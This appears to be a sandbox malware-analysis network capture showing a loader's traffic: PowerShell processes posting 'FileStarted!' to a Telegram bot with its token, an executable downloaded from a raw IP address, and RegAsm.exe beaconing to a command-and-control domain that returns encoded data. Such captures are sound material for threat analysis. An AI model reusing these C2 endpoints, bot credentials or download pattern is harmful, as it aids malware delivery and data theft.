                                                                                              Dec 27, 2024 22:33:10.586226940 CET1236INData Raw: 00 6e 00 49 00 64 00 69 00 49 00 31 00 66 00 76 00 67 00 45 00 2f 00 46 00 56 00 43 00 50 00 30 00 42 00 64 00 44 00 33 00 5a 00 6c 00 59 00 57 00 55 00 46 00 57 00 48 00 63 00 6d 00 53 00 43 00 36 00 69 00 62 00 37 00 59 00 43 00 39 00 32 00 38
                                                                                              Data Ascii: nIdiI1fvgE/FVCP0BdD3ZlYWUFWHcmSC6ib7YC928Snb4pmK+09Q/K9A/3a+N7D4aS9hBaaMMJJAbNljQ5jC1C7oHlHK2qCyZO0JW+0MQQ8xS0wRokTNqLcQY
                                                                                              Dec 27, 2024 22:33:10.586314917 CET1236INData Raw: 00 66 00 32 00 53 00 43 00 6c 00 33 00 2f 00 66 00 77 00 75 00 79 00 7a 00 38 00 6a 00 57 00 68 00 65 00 67 00 67 00 61 00 64 00 42 00 39 00 74 00 48 00 76 00 43 00 75 00 32 00 35 00 38 00 50 00 70 00 62 00 77 00 62 00 6d 00 54 00 47 00 62 00 53
                                                                                              Data Ascii: f2SCl3/fwuyz8jWheggadB9tHvCu258PpbwbmTGbScusJ8xJdj8IKvuMC/4EalA1ZtOXh/vKttGCA4iE614YiPzQ7aLufYd1GgMcVnNFZo+UKnEAgzEJ8XIU8
                                                                                              Dec 27, 2024 22:33:10.586342096 CET1236INData Raw: 00 63 00 44 00 69 00 4b 00 71 00 65 00 68 00 46 00 30 00 39 00 44 00 70 00 6b 00 53 00 4e 00 75 00 63 00 6e 00 71 00 58 00 2b 00 4b 00 41 00 44 00 65 00 32 00 4c 00 4a 00 4b 00 4a 00 37 00 4b 00 5a 00 68 00 71 00 58 00 63 00 72 00 67 00 6c 00 38
                                                                                              Data Ascii: cDiKqehF09DpkSNucnqX+KADe2LJKJ7KZhqXcrgl8C+uA/GJXNUWfMINuDpYSodeVzEe1eAVeNUAA64qRkyuVLALwIo6WeeYPVMBgUhUYxehi7Y3CUl1uogLy
                                                                                              Dec 27, 2024 22:33:10.586359024 CET1236INData Raw: 00 4c 00 64 00 4e 00 4b 00 79 00 6c 00 64 00 43 00 43 00 6b 00 71 00 43 00 36 00 5a 00 45 00 4b 00 44 00 6c 00 50 00 47 00 47 00 47 00 64 00 50 00 44 00 46 00 58 00 79 00 44 00 4b 00 77 00 50 00 66 00 30 00 49 00 47 00 57 00 53 00 4a 00 4c 00 36
                                                                                              Data Ascii: LdNKyldCCkqC6ZEKDlPGGGdPDFXyDKwPf0IGWSJL6q3pdhHOBNGwcY2OdQRyW70wjHfHtO3V8aJKMbDXzScF3Ge4xJ4zqp8We6gIkq/2e+6Fi5OyP7Z/rgGgQ
                                                                                              Dec 27, 2024 22:33:10.705765963 CET1236INData Raw: 00 33 00 7a 00 2b 00 54 00 78 00 57 00 4b 00 4c 00 64 00 6f 00 55 00 6d 00 42 00 72 00 62 00 70 00 79 00 56 00 42 00 4d 00 42 00 39 00 37 00 72 00 6e 00 4f 00 33 00 33 00 74 00 38 00 33 00 7a 00 46 00 57 00 7a 00 66 00 4b 00 39 00 41 00 56 00 4f
                                                                                              Data Ascii: 3z+TxWKLdoUmBrbpyVBMB97rnO33t83zFWzfK9AVODGzwWgKb2eVBdJ7ZjxefMH6k4JgJUPzJdCaRZJ8Ll9n5aPg9LVzBWkaWlEeUErissFw0KrZmHJDeYYUV
                                                                                              Dec 27, 2024 22:33:12.571594000 CET157OUTGET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Dec 27, 2024 22:33:12.982350111 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:12 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d [TRUNCATED]
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELYig@p@;0\;=.text `.rdata "@@.data8PT0@.reloc\;0<@B


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730149.154.167.2204436512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:32:57 UTC328OUTPOST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:32:58 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:32:58 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:32:58 UTC250INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 38 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 35 33 35 36 39 36 36 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 75 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 75 6b 6c 6f 61 64 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 35 34 30 31 36 32 33 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6c 69 7a 61 62 65 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 33 33 35 31 37 38 2c 22 74 65 78 74 22 3a 22 46 69 6c 65 53 74 61 72 74 65 64 21 22 7d 7d
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":1881,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335178,"text":"FileStarted!"}}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449732149.154.167.2204435300C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:32:57 UTC328OUTPOST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:32:58 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:32:58 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:32:58 UTC250INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 35 33 35 36 39 36 36 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 75 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 75 6b 6c 6f 61 64 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 35 34 30 31 36 32 33 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6c 69 7a 61 62 65 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 33 33 35 31 37 38 2c 22 74 65 78 74 22 3a 22 46 69 6c 65 53 74 61 72 74 65 64 21 22 7d 7d
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":1880,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335178,"text":"FileStarted!"}}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449731149.154.167.2204433752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:32:57 UTC328OUTPOST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:32:58 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:32:58 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:32:58 UTC250INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 35 33 35 36 39 36 36 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 75 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 75 6b 6c 6f 61 64 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 35 34 30 31 36 32 33 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6c 69 7a 61 62 65 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 33 33 35 31 37 38 2c 22 74 65 78 74 22 3a 22 46 69 6c 65 53 74 61 72 74 65 64 21 22 7d 7d
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":1882,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335178,"text":"FileStarted!"}}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449733149.154.167.2204437476C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:32:59 UTC328OUTPOST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:33:00 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:33:00 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:33:00 UTC250INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 38 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 35 33 35 36 39 36 36 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 75 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 75 6b 6c 6f 61 64 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 35 34 30 31 36 32 33 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6c 69 7a 61 62 65 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 33 33 35 31 38 30 2c 22 74 65 78 74 22 3a 22 46 69 6c 65 53 74 61 72 74 65 64 21 22 7d 7d
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":1883,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335180,"text":"FileStarted!"}}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449745104.21.60.244436424C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:13 UTC261OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:13 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=2oph71c3sel71hso5odme3vt2c; expires=Tue, 22 Apr 2025 15:19:52 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmmJp%2FhlSuL%2FWCgaV1aeg%2FAJcRYnFkomkjVteC%2FJUTrKCDnwoDwYIRYBMAUBtatrck3AIrXy9bBj1yKdLqyf76lNr%2BungG0tbesXn9o%2FhZ%2FgqmV6kwjZLKQgn37Xlcxrbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d7efad55e6c-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1673&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1677197&cwnd=237&unsent_bytes=0&cid=47209a9686d52d27&ts=776&x=0"
                                                                                              2024-12-27 21:33:13 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449746104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:13 UTC261OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:14 UTC1128INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1234ibl11t21ig4k2evuak9dlc; expires=Tue, 22 Apr 2025 15:19:52 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94yZa9yPcGyva%2FTXafhMQLPhzNrD1Lxj138RE1fRMIjqG%2BU2LkhJC79RhhJOZo5Fk1mReMi6agnW6atyMm20uQZXaZyLpcaktaCUcjKK7U0%2Fl9ILT5tztT%2FC5bLRl5uk9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d7fbff243d3-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1911&rtt_var=727&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1493606&cwnd=236&unsent_bytes=0&cid=09b7c63d55555585&ts=1007&x=0"
                                                                                              2024-12-27 21:33:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449747104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:13 UTC261OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:14 UTC1131INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6bk1tb5m6ch4l3l8cgea5cak5c; expires=Tue, 22 Apr 2025 15:19:52 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2B8bQBl4vJwNEi%2F%2BUPBzWPJgMcdrT4NlT6uNSvBO2Id66hmzYqoWV29t8%2Fy8V9ojgWiXt8lQgAN8sL%2FACeWlORaNFEzo52q1GI%2FZ57aLUeEhJ4hT7ZNUfYpCtdBOeQItVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d7fec4e8ca8-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2030&rtt_var=961&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1031802&cwnd=162&unsent_bytes=0&cid=a364ae49f83ee0b6&ts=988&x=0"
                                                                                              2024-12-27 21:33:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449750104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:15 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 52
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:15 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=
                                                                                              2024-12-27 21:33:16 UTC1135INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=b4gm06ntp6fivthrqfu0a6ciu3; expires=Tue, 22 Apr 2025 15:19:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ykw%2BNEBMQrc8gvCjHXNbAsNDPnXbKSoL3yOIGtWdwcHL6%2Bfnfmni39Dy7%2F0tqKBny1IRXgMniuDloncExtZgGpSZP2SV%2B%2F%2BT%2B6t%2FNo0NoKgTMtSNa1CQNoP4X79QMwoFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d8e6984429d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2049&rtt_var=868&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=950&delivery_rate=1192810&cwnd=246&unsent_bytes=0&cid=e24a550f5921ae6d&ts=779&x=0"
                                                                                              2024-12-27 21:33:16 UTC234INData Raw: 34 39 31 63 0d 0a 4b 34 42 69 34 66 31 59 32 72 4f 6b 77 79 4f 69 41 35 6e 72 4a 68 4e 2f 74 77 38 41 45 69 6e 47 4b 35 75 50 4b 79 4b 54 7a 48 35 51 6f 68 54 44 78 32 7a 32 6b 64 65 6d 41 5a 68 33 36 35 35 44 50 31 33 57 61 79 49 6f 54 36 64 48 36 4f 6f 48 41 4f 57 68 58 42 48 6d 41 34 32 4f 50 66 61 52 77 62 73 42 6d 46 6a 69 79 55 4e 39 58 59 30 74 5a 58 68 4c 70 30 66 35 37 6b 42 4e 34 36 41 64 51 2b 77 46 69 5a 67 37 76 74 4c 49 72 6b 62 48 5a 76 69 42 53 48 6f 53 33 32 49 69 50 67 75 6a 55 62 6d 31 43 57 2f 32 75 42 39 6d 34 52 47 4b 33 79 58 32 79 49 61 6d 54 59 41 35 75 34 70 44 63 52 50 52 61 32 74 36 51 61 35 50 2b 4f 74 42 55 76 71 71 46 6b 50 69 42 6f 69 53 4d 71 72 66 77 71 6c 4e
                                                                                              Data Ascii: 491cK4Bi4f1Y2rOkwyOiA5nrJhN/tw8AEinGK5uPKyKTzH5QohTDx2z2kdemAZh3655DP13WayIoT6dH6OoHAOWhXBHmA42OPfaRwbsBmFjiyUN9XY0tZXhLp0f57kBN46AdQ+wFiZg7vtLIrkbHZviBSHoS32IiPgujUbm1CW/2uB9m4RGK3yX2yIamTYA5u4pDcRPRa2t6Qa5P+OtBUvqqFkPiBoiSMqrfwqlN
